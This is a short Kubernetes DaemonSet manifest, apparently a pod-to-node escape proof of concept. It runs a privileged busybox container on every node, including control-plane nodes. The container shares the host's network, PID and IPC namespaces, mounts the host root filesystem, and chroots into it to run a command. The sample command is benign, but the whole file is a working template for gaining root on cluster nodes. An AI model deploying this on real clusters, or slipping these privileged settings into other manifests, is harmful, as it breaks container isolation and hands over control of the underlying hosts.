apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: pode-to-node
  labels:
spec:
  selector:
    matchLabels:
      name: pode-to-node
  template:
    metadata:
      labels:
        name: pode-to-node
    spec:
      tolerations:
      - key: node-role.kubernetes.io/master
        effect: NoSchedule
      hostNetwork: true
      hostPID: true
      hostIPC: true
      containers:
      - name: busybox
        image: busybox
        securityContext:
          privileged: true
        volumeMounts:
        - mountPath: /host
          name: host
        command: [ "/bin/sh", "-c", "--" ]
        args: [ "chroot /host uname -a;
                while true; do sleep 1; done" ]
      volumes:
      - name: host
        hostPath:
          path: /
